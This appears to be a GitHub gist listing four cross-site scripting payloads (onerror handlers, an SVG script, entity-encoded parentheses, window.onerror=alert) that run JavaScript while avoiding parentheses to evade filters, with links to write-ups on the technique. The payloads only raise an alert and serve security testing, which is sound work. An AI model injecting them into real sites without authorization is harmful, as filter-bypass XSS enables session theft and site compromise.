Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
depending on your specific scenario you might want to try to inject one of those:
<img onerror="window.alert('hey')" src="bla"/>
<svg><script>alert&#40/hey/.source&#41</script></svg>
<img onerror="window.onerror=alert;throw 'hey'" src="bla"/>
<script>window.onerror=alert;throw "hey";</script>
inspiration:
- http://www.thespanner.co.uk/2012/05/01/xss-technique-without-parentheses/
- https://security.stackexchange.com/a/36630/8000
- https://security.stackexchange.com/questions/71317/stored-cross-site-scripting-without-parentheses-or-spaces
- https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment